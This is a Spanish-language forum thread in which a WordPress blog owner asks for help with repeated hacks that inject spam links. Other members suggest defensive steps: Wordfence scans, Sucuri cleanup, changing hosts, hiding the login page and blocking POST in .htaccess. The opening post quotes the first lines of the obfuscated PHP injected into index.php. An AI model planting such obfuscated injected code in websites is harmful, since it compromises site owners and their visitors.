Hackeo constante blog Wordpress

NoLimits

NoLimits Seguir

Épsilon
SEO
Verificación en dos pasos desactivada
Desde
16 Dic 2010
Mensajes
804
Hola amigos,

Durante la ultima semana mi blog ha sido victima de constantes hackeos. Ya descubrí qué es lo que hacen pero no sé como evitarlo.

Modifican el archivo index.php añadiendo algo así:

Insertar CODE, HTML o PHP: 
<?php
$f8de0e = "5c098e1a2f8de0e1eb6618748fee7214";
header('Content-Type:text/html; charset=utf-8');
$O0__0O_O0O='oenme8776';
$OO0O0__0_O=14683;
$O0O0__O0_O='index.php/BC/Sy65Jk/D-YnJ6xHR_hqrxq_eskghre_ntpnumv.gn.jj';
$O___OO000O=1;
$O0_0O_OO0_=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");

Son cientos de líneas las que agregan y Google empieza a detectar miles de enlaces basura por lo que tengo que estar revisando y para solucionarlo reinstalo wordpress pero al poco tiempo vuelven a modificar el archivo.

Ya instale WP Security, modifique el archivo .htaccess, ajuste los permisos de escritura, cambie contraseñas. No sé que más puedo hacer y por eso acudo a ustedes esperando que puedan ayudarme. :confused:

Saludos
 
ramonjosegn

ramonjosegn

Sigma
Verificación en dos pasos activada
Verificado por Whatsapp
¡Usuario popular!
Desde
14 Feb 2010
Mensajes
69.525
Hola [MENTION=4446]NoLimits[/MENTION]

Te recomiendo cambiar de hosting. Además pon al hosting al tanto de este problema y que bloqueen el acceso de esa IP (pero pueden ser varias).

También te recomiendo cambiar contraseñas, ocultar el enlace de ingreso al login (incluso eliminarlo si lo crees necesario).

Revisa que themes y plugins estén actualizados y que no estés usando nada no comprado legalmente.

Cambia el plugin de protección por Wordfence y déjalo por ahora en modo "estoy recbiendo un ataque" para que el cortafuegos sea más agresivo.

También puedes probar con Incapsula o CloudFlare (tienen opciones gratis).

- - - Actualizado - - -

Este plugin es nuevo y creará una nueva dirección para el login con 2 palabras clave y además desactivará XMLRPC que es conocido por ser algo vulnerable (se usa para enviar pings y otras comunicaciones que ya nadie usa hoy día).

WP Login Door — WordPress Plugins
https://wordpress.org/plugins/wp-login-door/
 
NoLimits

NoLimits

Épsilon
SEO
Verificación en dos pasos desactivada
Desde
16 Dic 2010
Mensajes
804
ramonjosegn dijo:
Hola [MENTION=4446]NoLimits[/MENTION]

Te recomiendo cambiar de hosting. Además pon al hosting al tanto de este problema y que bloqueen el acceso de esa IP (pero pueden ser varias).

También te recomiendo cambiar contraseñas, ocultar el enlace de ingreso al login (incluso eliminarlo si lo crees necesario).

Revisa que themes y plugins estén actualizados y que no estés usando nada no comprado legalmente.

Cambia el plugin de protección por Wordfence y déjalo por ahora en modo "estoy recbiendo un ataque" para que el cortafuegos sea más agresivo.

También puedes probar con Incapsula o CloudFlare (tienen opciones gratis).

- - - Actualizado - - -

Este plugin es nuevo y creará una nueva dirección para el login con 2 palabras clave y además desactivará XMLRPC que es conocido por ser algo vulnerable (se usa para enviar pings y otras comunicaciones que ya nadie usa hoy día).

WP Login Door — WordPress Plugins
https://wordpress.org/plugins/wp-login-door/
Hacer clic para expandir...


Enrique J Ros dijo:
Yo añadiría: usa Wordfence para comprobar qué archivos han cambiado respecto a los del repositorio y usa Sucuri para una limpieza post-hackeo. En este artículo explico el proceso estándar a seguir después de un hackeo en WordPress: Recuperar un WordPress hackeado - Enrique J. Ros
Hacer clic para expandir...

Muchas gracias a ambos por la recomendación, instale el plugin Wordfence y realice un análisis con el cual logre encontrar un archivo php escondido dentro del directorio /js :s el cual tenia código malicioso.

Ahora que lo eliminé, todo va bien :p7:

Saludos :encouragement:
 
U

Usuario eliminado 8086

Recomiendo que contrates un programador que te re instale el Wordpress y te revise por donde entraron y te parchee el bug.

Saludos
 
Gonzbort

Gonzbort

Gamma
Social Media
Verificación en dos pasos desactivada
Verificado por Whatsapp
Desde
1 Dic 2014
Mensajes
303
Saludos, te recomiendo que cambies de Host, ya que podrías ser víctima de algún Shell inyectado en el, así te evitas problemas futuros.
 
U

Usuario eliminado 8086

Lo más probable es que no sea el host, la mayoría de las veces es una vulnerabilidad de un script tuyo. Y cuando te la explotaron te instalaron puertas traseras

Saludos
 
jgm302

jgm302

Beta
Verificación en dos pasos desactivada
Desde
17 Jul 2012
Mensajes
132
Si tienes acceso a la consola te recomiendo que ejecutes los comandos que salen en este post para ver si estas enviando mucho correo de spam desde tu wordpress
Como evitar que nuestro wodpress envie correos de spam | Webnivel
Si puedes también indicanos que panel o como tienes configurado el servidor, este tipo de hackeos los he tenido por un plugin con un bug pero algunos paneles o configuraciones son menos propensas.
Por lo que veo en tu código y unido al otro que encontraste están ejecutando código a través del metodo POST, lo que puedes hacer es mediante el archivo htaccess bloquearlo y así nadie podrá loguearse ni ejecutar código (ni si quiera tu) pero la web seguirá funcionando.
 

¡Regístrate y comienza a ganar!

Beneficios

  • Gana dinero por participar
  • Gana dinero por recomendarnos
  • Descubre ofertas de empleo diariamente
  • Negocios seguros
  • ¡Información premium y más!
Registro

Acceder

¿Ya tienes una cuenta? Accede aquí

Arriba